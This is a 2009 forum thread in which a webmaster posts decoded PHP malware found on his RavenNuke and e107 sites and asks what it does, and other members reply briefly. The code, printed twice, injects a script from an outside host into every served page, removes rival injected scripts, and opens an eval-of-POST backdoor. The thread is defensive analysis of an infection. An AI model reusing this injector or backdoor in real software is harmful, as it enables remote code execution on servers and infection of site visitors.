Some php virus

registered · Posted: Fri Nov 06, 2009 5:30 pm

Good evening ... I ran into a virus last thursday and i was wondering if you guys could validates my explanation.
That code you see was decoded from base64.
http://www.opinionatedgeek.com/dotnet/tools/Base64Decode/
I voluntary left the two base64 undecoded , but it's leading to some script at http:[slash][slash]zangmusic[dot]com/images/zang-sullivanroom-22nov08pt2[dot]php , probably another iframed virus...wouldn't want to check

Code:

if(!function_exists('jruq')){


   function jruq($s){


if(preg_match_all('#<script(.*?)</script>#is',$s,$a))


foreach($a[0]as$v)if(count(explode("\n",$v))>5){


$e=preg_match('#[\'"][^\s\'"\.,;\?!\[\]:/<>\(\)]{30,}#',$v)||preg_match('#[\(\[](\s*\d+,){20,}#',$v);


if((preg_match('#\beval\b#',$v)&&($e||strpos($v,'fromCharCode')))||($e&&strpos($v,'document.write')))$s=str_replace($v,'',$s);


}





if(preg_match_all('#<iframe ([^>]*?)src=[\'"]?(http:)?//([^>]*?)>#is',$s,$a))


foreach($a[0]as$v)


if(preg_match('#[\. ]width\s*=\s*[\'"]?0*[0-9][\'"> ]|display\s*:\s*none#i',$v)&&!strstr($v,'?'.'>'))


$s=preg_replace('#'.preg_quote($v,'#').'.*?</iframe>#is','',$s);





$s=str_replace($a=base64_decode('PHNjcmlwdCBzcmM9aHR0cDovL3phbmdtdXNpYy5jb20vaW1hZ2VzL3phbmctc3VsbGl2YW5yb29tLTIybm92MDhwdDIucGhwID48L3NjcmlwdD4='),'',$s);


if(stristr($s,'<body'))


$s=preg_replace('#(\s*<body)#mi',$a.'\1',$s,1);


elseif(strpos($s,'<a'))$s=$a.$s;return$s;}


function jruq2($a,$b,$c,$d){


global$jruq1;


$s=array();


if(function_exists($jruq1))call_user_func($jruq1,$a,$b,$c,$d);


foreach(@ob_get_status(1)as$v)if(($a=$v['name'])=='jruq')return;


elseif($a=='ob_gzhandler')break;


else


$s[]=array($a=='default output handler'?false:$a);


for($i=count($s)-1;$i>=0;$i--){$s[$i][1]=ob_get_contents();


ob_end_clean();}ob_start('jruq');


for($i=0;$i<count($s);$i++){ob_start($s[$i][0]);


echo $s[$i][1];}}}$jruql=(($a=@set_error_handler('jruq2'))!='jruq2')?$a:0;


eval(base64_decode($_POST['e']));





if(!function_exists('jruq')){


function jruq($s){


if(preg_match_all('#<script(.*?)</script>#is',$s,$a))foreach($a[0]as$v)if(count(explode("\n",$v))>5){


$e=preg_match('#[\'"][^\s\'"\.,;\?!\[\]:/<>\(\)]{30,}#',$v)||preg_match('#[\(\[](\s*\d+,){20,}#',$v);


if((preg_match('#\beval\b#',$v)&&($e||strpos($v,'fromCharCode')))||($e&&strpos($v,'document.write')))$s=str_replace($v,'',$s);


}





if(preg_match_all('#<iframe ([^>]*?)src=[\'"]?(http:)?//([^>]*?)>#is',$s,$a))foreach($a[0]as$v)if(preg_match('#[\. ]width\s*=\s*[\'"]?0*[0-9][\'"> ]|display\s*:\s*none#i',$v)&&!strstr($v,'?'.'>'))$s=preg_replace('#'.preg_quote($v,'#').'.*?</iframe>#is','',$s);


$s=str_replace($a=base64_decode('PHNjcmlwdCBzcmM9aHR0cDovL3phbmdtdXNpYy5jb20vaW1hZ2VzL3phbmctc3VsbGl2YW5yb29tLTIybm92MDhwdDIucGhwID48L3NjcmlwdD4='),'',$s);


if(stristr($s,'<body'))$s=preg_replace('#(\s*<body)#mi',$a.'\1',$s,1);


elseif(strpos($s,'<a'))$s=$a.$s;


return$s;


}


function jruq2($a,$b,$c,$d){


global$jruq1;


$s=array();


if(function_exists($jruq1))call_user_func($jruq1,$a,$b,$c,$d);


foreach(@ob_get_status(1)as$v)if(($a=$v['name'])=='jruq')return;


elseif($a=='ob_gzhandler')break;


else$s[]=array($a=='default output handler'?false:$a);


for($i=count($s)-1;$i>=0;$i--){$s[$i][1]=ob_get_contents();


ob_end_clean();


}ob_start('jruq');


for($i=0;$i<count($s);$i++){ob_start($s[$i][0]);


echo $s[$i][1];


}


}


}


$jruql=(($a=@set_error_handler('jruq2'))!='jruq2')?$a:0;eval(base64_decode($_POST['e']));

I'm understanding of this script is that it replaces all the </body> stuff to </body>some scripts of every file it's running into .My understanding is very limited and I could need some light over here. Not only some of my members ran into this when they logged on 2 days ago , now its my RN2.4 sites and some e107 sites.
thank you Smile

Posted: Mon Nov 09, 2009 4:53 pm

*Bump* still need help..

Posted: Mon Nov 09, 2009 6:09 pm

eldorado, what exactly are you asking? Obviously it appears to be a malicious script, but how did you come across it? How did you come to be there?

If it was uploaded to your site you need to find your access logs to see how it was done. If it was uploaded to your site there is not much we can do without know how it was done.

registered · Posted: Tue Nov 10, 2009 12:08 am

Pretty standard obfuscation - doesn't seem to do anything unless you know what is passed into
$_POST['e']

Posted: Tue Nov 10, 2009 1:54 am

Palbin wrote:

eldorado, what exactly are you asking? Obviously it appears to be a malicious script, but how did you come across it? How did you come to be there?

Well for some obscure reason , my e107 site from which originated the attack doesn't provide ftp logs.So that'd be an issue. However the rn2.4 got "hacked" because I was infected during my stay on the e107 one. It used my saved password on filezilla to get into my ftp.(I got rid of the trojan)

But the question is , what exactly is it doing? I know malicious scripts should be deleted immediately but I need to know where they are first , hence my question.

Posted: Tue Nov 10, 2009 6:40 am

Ah. I will have to differ to evaders99 then Smile

Posted: Tue Nov 10, 2009 11:32 am

evaders99 wrote:

Pretty standard obfuscation - doesn't seem to do anything unless you know what is passed into
$_POST['e']

ok , so basicly it's just Myurl.com/thefile.php?e="somebase64" , so no way to know what it does , unless you know what was posted.. that is pretty obscure for me:( And really annoying.

Posted: Tue Nov 10, 2009 8:14 pm

yep pretty much